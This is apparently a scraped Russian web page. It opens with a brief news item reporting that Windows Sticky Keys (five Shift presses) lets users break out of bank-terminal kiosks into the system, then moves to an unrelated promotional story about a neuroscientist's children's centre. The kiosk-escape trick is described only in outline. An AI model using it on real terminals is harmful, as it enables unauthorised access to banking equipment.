Одной из самых «древних» функций в Windows является режим залипания клавиш, активирующийся пятикратным нажатием на клавишу Shift. Пользователь «Хабрахабр» под псевдонимом namikiri обнаружил , что данная функция работает на банковских терминалах и позволяет попасть в систему.

https://www.securitylab.ru/news/490559.php

https://habrahabr.ru/post/345038/.com

Чем глубже изучаешь мозг, тем больше возникает вопросов. Истории успеха, достойные «Горячего» на Пикабу #3

Чем глубже изучаешь мозг, тем больше возникает вопросов. Истории успеха, достойные «Горячего» на Пикабу #3

Вячеслав Лебедев – сотрудник и аспирант МГУ им. М.В. Ломоносова. При знакомстве с трудами нейроученых понял, что мозг – целая вселенная внутри человека, и при более глубоком его изучении возникает еще больше вопросов. Вячеслав создал центр нейрофизиологической немедикаментозной помощи детям NeuroFuture, где уже несколько лет занимается развитием внимания и концентрации у детей.


Такие истории успеха вдохновляют, заставляют искать профессию мечты и посвящать свою жизнь тому, что любишь.

Отличная работа, все прочитано!